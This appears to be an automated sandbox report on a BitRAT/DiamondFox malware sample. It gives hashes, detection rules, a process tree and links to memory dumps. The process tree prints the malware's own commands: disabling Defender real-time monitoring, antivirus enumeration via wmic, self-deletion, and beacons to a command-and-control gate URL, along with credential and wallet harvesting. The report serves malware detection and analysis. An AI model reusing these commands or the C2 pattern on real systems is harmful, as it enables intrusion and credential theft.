bitrat | 3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187

Analysis

max time kernel
144s
max time network
151s
platform
windows7_x64
resource
win7v20210410
submitted
03-07-2021 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mixazed_20210703-205320.exe
Size

1.8MB
MD5

8703d31eadccffa270ba764a35dfd548
SHA1

6dd74fef8122095da64955abd99f38421629445d
SHA256

3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
SHA512

f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2

Score

10^/10

bitrat diamondfox botnet discovery spyware stealer trojan upx

Malware Config

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

BitRAT Payload 1 IoCs

resource	yara_rule
behavioral1/memory/772-71-0x00000000007E2730-mapping.dmp	family_bitrat

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 19 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral1/files/0x00030000000130eb-74.dat	diamondfox
behavioral1/files/0x00030000000130eb-75.dat	diamondfox
behavioral1/files/0x00030000000130eb-76.dat	diamondfox
behavioral1/files/0x00030000000130eb-77.dat	diamondfox
behavioral1/files/0x00030000000130eb-79.dat	diamondfox
behavioral1/files/0x00030000000130eb-81.dat	diamondfox
behavioral1/files/0x00030000000130ed-82.dat	diamondfox
behavioral1/files/0x00030000000130ed-83.dat	diamondfox
behavioral1/files/0x00030000000130ed-85.dat	diamondfox
behavioral1/files/0x00030000000130ed-95.dat	diamondfox
behavioral1/files/0x00030000000130ed-96.dat	diamondfox
behavioral1/files/0x00030000000130ed-158.dat	diamondfox
behavioral1/files/0x00030000000130ed-163.dat	diamondfox
behavioral1/files/0x00030000000130ed-170.dat	diamondfox
behavioral1/files/0x00030000000130ed-175.dat	diamondfox
behavioral1/files/0x00030000000130ed-178.dat	diamondfox
behavioral1/files/0x00030000000130ed-180.dat	diamondfox
behavioral1/files/0x00030000000130ed-185.dat	diamondfox
behavioral1/files/0x00030000000130ed-187.dat	diamondfox

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView
behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp	MailPassView
behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView
behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/472-169-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral1/memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp	Nirsoft
behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
828	sVQTwb6rts5kF2Qe.exe
844	MicrosoftEdgeCPS.exe
1132	MicrosoftEdgeCPS.exe
1276	MicrosoftEdgeCPS.exe
472	MicrosoftEdgeCPS.exe
1684	MicrosoftEdgeCPS.exe
1988	MicrosoftEdgeCPS.exe
1804	MicrosoftEdgeCPS.exe
1948	MicrosoftEdgeCPS.exe
1316	MicrosoftEdgeCPS.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmp	upx

Loads dropped DLL 7 IoCs

pid	Process
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
828	sVQTwb6rts5kF2Qe.exe
828	sVQTwb6rts5kF2Qe.exe
844	MicrosoftEdgeCPS.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 2004 set thread context of 772	2004	mixazed_20210703-205320.exe	29
PID 844 set thread context of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 set thread context of 1276	844	MicrosoftEdgeCPS.exe	54
PID 844 set thread context of 472	844	MicrosoftEdgeCPS.exe	55
PID 844 set thread context of 1684	844	MicrosoftEdgeCPS.exe	56
PID 844 set thread context of 1988	844	MicrosoftEdgeCPS.exe	57
PID 844 set thread context of 1804	844	MicrosoftEdgeCPS.exe	60
PID 844 set thread context of 1948	844	MicrosoftEdgeCPS.exe	61
PID 844 set thread context of 1316	844	MicrosoftEdgeCPS.exe	62

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 4 IoCs

evasion

pid	Process
828	taskkill.exe
1640	taskkill.exe
1360	taskkill.exe
1160	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1716	notepad.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2004	mixazed_20210703-205320.exe
2004	mixazed_20210703-205320.exe
1588	powershell.exe
1188	powershell.exe
1188	powershell.exe
1588	powershell.exe
844	MicrosoftEdgeCPS.exe
1132	MicrosoftEdgeCPS.exe
1132	MicrosoftEdgeCPS.exe
844	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	mixazed_20210703-205320.exe
Token: SeDebugPrivilege	772	mixazed_20210703-205320.exe
Token: SeShutdownPrivilege	772	mixazed_20210703-205320.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeIncreaseQuotaPrivilege	332	wmic.exe
Token: SeSecurityPrivilege	332	wmic.exe
Token: SeTakeOwnershipPrivilege	332	wmic.exe
Token: SeLoadDriverPrivilege	332	wmic.exe
Token: SeSystemProfilePrivilege	332	wmic.exe
Token: SeSystemtimePrivilege	332	wmic.exe
Token: SeProfSingleProcessPrivilege	332	wmic.exe
Token: SeIncBasePriorityPrivilege	332	wmic.exe
Token: SeCreatePagefilePrivilege	332	wmic.exe
Token: SeBackupPrivilege	332	wmic.exe
Token: SeRestorePrivilege	332	wmic.exe
Token: SeShutdownPrivilege	332	wmic.exe
Token: SeDebugPrivilege	332	wmic.exe
Token: SeSystemEnvironmentPrivilege	332	wmic.exe
Token: SeRemoteShutdownPrivilege	332	wmic.exe
Token: SeUndockPrivilege	332	wmic.exe
Token: SeManageVolumePrivilege	332	wmic.exe
Token: 33	332	wmic.exe
Token: 34	332	wmic.exe
Token: 35	332	wmic.exe
Token: SeIncreaseQuotaPrivilege	332	wmic.exe
Token: SeSecurityPrivilege	332	wmic.exe
Token: SeTakeOwnershipPrivilege	332	wmic.exe
Token: SeLoadDriverPrivilege	332	wmic.exe
Token: SeSystemProfilePrivilege	332	wmic.exe
Token: SeSystemtimePrivilege	332	wmic.exe
Token: SeProfSingleProcessPrivilege	332	wmic.exe
Token: SeIncBasePriorityPrivilege	332	wmic.exe
Token: SeCreatePagefilePrivilege	332	wmic.exe
Token: SeBackupPrivilege	332	wmic.exe
Token: SeRestorePrivilege	332	wmic.exe
Token: SeShutdownPrivilege	332	wmic.exe
Token: SeDebugPrivilege	332	wmic.exe
Token: SeSystemEnvironmentPrivilege	332	wmic.exe
Token: SeRemoteShutdownPrivilege	332	wmic.exe
Token: SeUndockPrivilege	332	wmic.exe
Token: SeManageVolumePrivilege	332	wmic.exe
Token: 33	332	wmic.exe
Token: 34	332	wmic.exe
Token: 35	332	wmic.exe
Token: SeIncreaseQuotaPrivilege	1148	wmic.exe
Token: SeSecurityPrivilege	1148	wmic.exe
Token: SeTakeOwnershipPrivilege	1148	wmic.exe
Token: SeLoadDriverPrivilege	1148	wmic.exe
Token: SeSystemProfilePrivilege	1148	wmic.exe
Token: SeSystemtimePrivilege	1148	wmic.exe
Token: SeProfSingleProcessPrivilege	1148	wmic.exe
Token: SeIncBasePriorityPrivilege	1148	wmic.exe
Token: SeCreatePagefilePrivilege	1148	wmic.exe
Token: SeBackupPrivilege	1148	wmic.exe
Token: SeRestorePrivilege	1148	wmic.exe
Token: SeShutdownPrivilege	1148	wmic.exe
Token: SeDebugPrivilege	1148	wmic.exe
Token: SeSystemEnvironmentPrivilege	1148	wmic.exe
Token: SeRemoteShutdownPrivilege	1148	wmic.exe
Token: SeUndockPrivilege	1148	wmic.exe
Token: SeManageVolumePrivilege	1148	wmic.exe
Token: 33	1148	wmic.exe
Token: 34	1148	wmic.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
772	mixazed_20210703-205320.exe
772	mixazed_20210703-205320.exe
1276	MicrosoftEdgeCPS.exe
1804	MicrosoftEdgeCPS.exe
1948	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 2004 wrote to memory of 772	2004	mixazed_20210703-205320.exe	29
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	32
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	32
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	32
PID 772 wrote to memory of 828	772	mixazed_20210703-205320.exe	32
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	33
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	33
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	33
PID 828 wrote to memory of 844	828	sVQTwb6rts5kF2Qe.exe	33
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	34
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	34
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	34
PID 828 wrote to memory of 1588	828	sVQTwb6rts5kF2Qe.exe	34
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	36
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	36
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	36
PID 844 wrote to memory of 1188	844	MicrosoftEdgeCPS.exe	36
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	39
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	39
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	39
PID 844 wrote to memory of 332	844	MicrosoftEdgeCPS.exe	39
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	40
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	40
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	40
PID 844 wrote to memory of 1148	844	MicrosoftEdgeCPS.exe	40
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	43
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	43
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	43
PID 844 wrote to memory of 1684	844	MicrosoftEdgeCPS.exe	43
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	45
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	45
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	45
PID 844 wrote to memory of 1360	844	MicrosoftEdgeCPS.exe	45
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	47
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	47
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	47
PID 844 wrote to memory of 1784	844	MicrosoftEdgeCPS.exe	47
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	49
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	49
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	49
PID 844 wrote to memory of 536	844	MicrosoftEdgeCPS.exe	49
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	51
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	51
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	51
PID 844 wrote to memory of 432	844	MicrosoftEdgeCPS.exe	51
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1132	844	MicrosoftEdgeCPS.exe	53
PID 844 wrote to memory of 1276	844	MicrosoftEdgeCPS.exe	54
PID 844 wrote to memory of 1276	844	MicrosoftEdgeCPS.exe	54

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
  C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe
    "C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:844
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1188
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:332
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" os get caption /FORMAT:List
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1148
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get caption /FORMAT:List
        5⤵
        
        PID:1684
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
        5⤵
        
        PID:1360
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
        5⤵
        
        PID:1784
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
        5⤵
        
        PID:536
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
        5⤵
        
        PID:432
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1132
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1276
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
        5⤵
        Executes dropped EXE
        
        PID:472
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
        5⤵
        Executes dropped EXE
        
        PID:1684
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
        5⤵
        Executes dropped EXE
        
        PID:1988
      - C:\Windows\notepad.exe
        
        X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        6⤵
        Opens file in notepad (likely ransom note)
        
        PID:1716
      - C:\Windows\write.exe
        
        X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        6⤵
        
        PID:1608
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1804
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1948
    - - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        
        X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
        5⤵
        Executes dropped EXE
        
        PID:1316
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
        5⤵
        
        PID:1336
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
        5⤵
        
        PID:1344
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "taskkill" /PID 1988 /F
        5⤵
        Kills process with taskkill
        
        PID:1640
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "taskkill" /PID 1804 /F
        5⤵
        Kills process with taskkill
        
        PID:1360
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "taskkill" /PID 1316 /F
        5⤵
        Kills process with taskkill
        
        PID:1160
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "taskkill" /PID 1948 /F
        5⤵
        Kills process with taskkill
        
        PID:828
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe' -Force -Recurse
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/772-72-0x00000000765F1000-0x00000000765F3000-memory.dmp

Filesize
8KB

Download
memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1188-118-0x00000000061C0000-0x00000000061C1000-memory.dmp

Filesize
4KB

Download
memory/1188-148-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/1188-101-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1188-125-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1188-105-0x0000000002850000-0x0000000002851000-memory.dmp

Filesize
4KB

Download
memory/1188-110-0x0000000006040000-0x0000000006041000-memory.dmp

Filesize
4KB

Download
memory/1188-112-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1188-132-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/1188-100-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1188-149-0x0000000006310000-0x0000000006311000-memory.dmp

Filesize
4KB

Download
memory/1188-116-0x00000000060E0000-0x00000000060E1000-memory.dmp

Filesize
4KB

Download
memory/1276-166-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1276-161-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1316-191-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1588-98-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/1588-92-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/1588-102-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1588-99-0x0000000004792000-0x0000000004793000-memory.dmp

Filesize
4KB

Download
memory/1588-153-0x0000000006040000-0x0000000006041000-memory.dmp

Filesize
4KB

Download
memory/1588-91-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/1588-167-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1804-183-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1948-190-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1988-182-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2004-62-0x0000000000B20000-0x0000000000B21000-memory.dmp

Filesize
4KB

Download
memory/2004-63-0x0000000000B25000-0x0000000000B36000-memory.dmp

Filesize
68KB

Download
memory/2004-64-0x0000000005E00000-0x0000000005FA4000-memory.dmp

Filesize
1.6MB

Download
memory/2004-60-0x0000000000D60000-0x0000000000D61000-memory.dmp

Filesize
4KB

Download
memory/2004-69-0x0000000000550000-0x00000000005B5000-memory.dmp

Filesize
404KB

Download